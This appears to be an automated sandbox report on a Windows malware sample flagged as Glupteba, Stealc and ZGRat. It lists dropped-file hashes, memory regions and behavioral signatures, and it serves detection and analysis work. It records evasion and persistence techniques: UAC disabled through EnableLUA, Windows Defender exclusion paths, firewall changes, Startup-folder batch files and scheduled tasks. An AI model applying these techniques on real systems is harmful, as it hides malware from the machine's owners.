memory/2736-343-0x0000000000400000-0x0000000002957000-memory.dmp

memory/1136-345-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/1272-346-0x0000000000400000-0x0000000002957000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

memory/844-353-0x0000000000400000-0x0000000002957000-memory.dmp

memory/1272-352-0x0000000000400000-0x0000000002957000-memory.dmp

memory/1948-355-0x0000000000400000-0x0000000002957000-memory.dmp

\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 13aaafe14eb60d6a718230e82c671d57
SHA1 e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256 f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512 ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

\Users\Admin\AppData\Local\Temp\dbghelp.dll

MD5 f0616fa8bc54ece07e3107057f74e4db
SHA1 b33995c4f9a004b7d806c4bb36040ee844781fca
SHA256 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026
SHA512 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 5c399d34d8dc01741269ff1f1aca7554
SHA1 e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256 e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA512 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 5d4da2e9bb55c5a352fbd486505176a1
SHA1 6b1d06db1301292cfce31031e4bcb08cb29bb669
SHA256 3e2168e94fe2af3c14fc985a852aeee83ede6f068b84809254941dfd045c7158
SHA512 22a0eeed4389cb1b458ca4d8fa644ed35d2d2c06e164fadf3054f6207a593704abbe4b9e53908ab540c2b844a501f75d30cb6125c28b08e677111a4de92b8e01

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 4d4695e8ea3fda256ab57869cdc7923b
SHA1 70037d4e554e0f624425216070cf82e5baab1f8c
SHA256 3a64ae2174f48cae976225a6fcc823964cb96d17dd7a410b0ca144cb83dddd0e
SHA512 8aa8cef19f9f65397615edca0b66b1c3726422f8b041ac1ad6b883916d80d50a02b6b5bcf9ba1b55bbe90510e4ac0778b026bbc2ad3f1a3b19fbb2bf71d6df6d

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 90b92ef05cd20cdd9b6dd483033c4c51
SHA1 068a0b336981f88018d7c3e964519477f4742b7f
SHA256 263b873ca31a9b2bdfe9e7cbcc038a0f7e71bd97c19ca82d8ccb583d5092e73e
SHA512 146743eba427d66148e8c549dfb8ec69633a519be2cda29d15c62a9e3d0100cf75af25d48c7a0281c84780d6ef8e0dc0dfa0b66ad100ad37341cfa7cbfc51c77

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

memory/1100-385-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/1100-370-0x0000000140000000-0x00000001405E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 4234b4e23d92267606f9919d260b9ac7
SHA1 c4eca6755f5a1fabf482bae0c63db9af882c6f39
SHA256 e9decc8d59a7b2fc05fa7219fe6de248b0e218d9d079f7e08fde13a3cf0b8da1
SHA512 d9509b635b0b01514d564c33b9ab507c718b48c8d7b3d34872afe3885047f8719cba93f1903d97b139a03db49d9fa69d91d35ce8d3bdec554f6997e889724037

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 2b2f514fe36bb2f46df9cbe079b24087
SHA1 881b436454128af9c03912b200d1bde1426cc983
SHA256 0a965950c157b9377c1c10a120d80c907c88581573a2f87621698a6c95cea840
SHA512 c9861e3fc9d6aedb2402bf09e0d0cb358ac4a0d90456148576ac2de1d4bca39cf5757dc93a4b57d0569076bef728061bf8747921bdad4b68d471e5183b3cab82

memory/1136-402-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/2928-442-0x0000000000A90000-0x00000000042C4000-memory.dmp

memory/2928-443-0x000000001EF60000-0x000000001F06A000-memory.dmp

memory/2928-444-0x0000000000A70000-0x0000000000A80000-memory.dmp

memory/2928-445-0x0000000005910000-0x000000000591C000-memory.dmp

memory/2928-446-0x0000000000A80000-0x0000000000A94000-memory.dmp

memory/2928-447-0x0000000005C50000-0x0000000005C74000-memory.dmp

memory/2928-456-0x000000001E530000-0x000000001E55A000-memory.dmp

memory/2928-457-0x000000001F130000-0x000000001F1E2000-memory.dmp

memory/844-448-0x0000000000400000-0x0000000002957000-memory.dmp

memory/2928-455-0x00000000059D0000-0x00000000059DA000-memory.dmp

memory/2928-458-0x00000000007E0000-0x00000000007EA000-memory.dmp

memory/2928-462-0x000000001FAE0000-0x000000001FDE0000-memory.dmp

memory/2928-466-0x0000000000800000-0x000000000080A000-memory.dmp

memory/2928-465-0x0000000000800000-0x000000000080A000-memory.dmp

memory/2928-468-0x000000001EA80000-0x000000001EAE2000-memory.dmp

memory/2928-469-0x00000000058E0000-0x0000000005902000-memory.dmp

memory/2928-467-0x0000000000A60000-0x0000000000A6A000-memory.dmp

memory/2928-472-0x0000000005900000-0x000000000590C000-memory.dmp

memory/844-473-0x0000000000400000-0x0000000002957000-memory.dmp

memory/2928-489-0x0000000000800000-0x000000000080A000-memory.dmp

memory/2928-490-0x0000000000800000-0x000000000080A000-memory.dmp

memory/844-491-0x0000000000400000-0x0000000002957000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\81950f7e7cbd108086cf2da3a401afdfffc60d9b485aac5dd52f7a137c00f950\12d9eca87ed0486788a58b9b6fe30f14.tmp

MD5 4f335bf1c2eae8fe33de7f1bd6b1cbbe
SHA1 8da2941b0fd5d28439b5bad674e81cd82757e796
SHA256 e6c0b9976618f362a8f2137d195419cb8ecb9a8cc5f83e18dd71bf79c7103375
SHA512 bc4c9037cf3bd5b2b3920e931385a1068a344c93d0d31515069e7d59a5100e76154e88c903b95d26193fb436a8ddbbf819e734ba9837cef5ce931a22980bc136

memory/2512-497-0x0000000000400000-0x0000000002574000-memory.dmp

memory/844-501-0x0000000000400000-0x0000000002957000-memory.dmp

memory/844-508-0x0000000000400000-0x0000000002957000-memory.dmp

memory/844-510-0x0000000000400000-0x0000000002957000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 040567db254dae9e50f2b3549c9cef9a
SHA1 a39f17019de25869d4853df8f75bb0198352a6fa
SHA256 f9401664d946a459a4a28b60fa4c52653f6127f1ede984a95df5164aa2c6ea77
SHA512 db5625366a1a0990d51458d83f43dc38ee97132108ac903ec073ee4773fc11b363b28245067a53f0fcf9983505491715f1e9277a9f827ee64a78df5593890c99

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

memory/844-527-0x0000000000400000-0x0000000002957000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 fafbf2197151d5ce947872a4b0bcbe16
SHA1 a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020
SHA256 feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71
SHA512 acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

MD5 d98e78fd57db58a11f880b45bb659767
SHA1 ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512 aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

memory/2512-540-0x0000000000400000-0x0000000002574000-memory.dmp

memory/844-546-0x0000000000400000-0x0000000002957000-memory.dmp

C:\Windows\windefender.exe

MD5 291dc2e3fa09bcf037586ea361845a22
SHA1 e095d24a8c3fbffa5b4160a53aa8348c4dc2d093
SHA256 fa4defc273384cb374400c93627cd711a2c25c43343b5b14e74f1d98d32cb8e4
SHA512 d061664fc8e22451696c0e51caa6217489fcb2f11e2f88c7ec04682b51348fad3a94638a1a7734f28147a4334f9c10caff2d342f7721417a26aef91d638fe52e

memory/2024-550-0x0000000000400000-0x00000000008DF000-memory.dmp

C:\Windows\windefender.exe

MD5 e2c9584990d405e5b884e7f60869ec2f
SHA1 9b46efe5084d41d16936c24c1f95a9b748506d01
SHA256 408ad93197e4cf94157d8c6ed1d5e7f9cc0aa755b74a41ddd19a29b91606fb59
SHA512 bfec36a925cec1c2a280c38a2fb5b1ca05b1b9eb68332931a92a8e60d0fb47003c61a35ab013aa89978767142af008a5cb0e3db30952b59a6dd030e975efefe3

memory/3040-553-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/2024-555-0x0000000000400000-0x00000000008DF000-memory.dmp

memory/844-557-0x0000000000400000-0x0000000002957000-memory.dmp

memory/3040-558-0x0000000000400000-0x00000000008DF000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-09 03:33

Reported

2024-05-09 03:36

Platform

win10v2004-20240426-en

Max time kernel

37s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe = "0" C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A

ZGRat

rat zgrat

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\tehUCNoYrTKDGV6OXIKXpSpO.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ep5TwNKvUwdyPDoIHAQUMpCs.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sGn6DaoKUBF4WWlOItI7u4Gm.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\86Zp0EmxuAuS22SLWZyfIL49.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RiR6CTbrZrpMxY8KkXD6hg0g.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Qap7V3dROhFV1NeaOeXSSyol.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\twT78Mx9z83SdTlWudKKUo0W.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\g6wMedraySsiYCyr3FHKGcj4.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe = "0" C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2208 set thread context of 2324 N/A C:\Users\Admin\AppData\Local\Temp\0fe604088fc3cb6f07ba074b4100627239bd38456f256a9083f2e8e12dd82ad3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\ub4.0.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ub4.1.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ub4.1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\ub4.1.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-201 = "US Mountain Daylight Time" C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" C:\Users\Admin\Pictures\jeIFeZnFMtOxggvMiEDB9wtH.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2321 = "Sakhalin Daylight Time" C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time" C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2892 = "Sudan Standard Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2511 = "Lord Howe Daylight Time" C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" C:\Users\Admin\Pictures\EXJFFOSgYliuK9SKrPlmD4DI.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\Pictures\YIo8EHAhe4x0lr74YkyQyWCf.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3142 = "South Sudan Standard Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time" C:\Users\Admin\Pictures\KiDKrfGEOZFnMNlcPxqWtZNQ.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
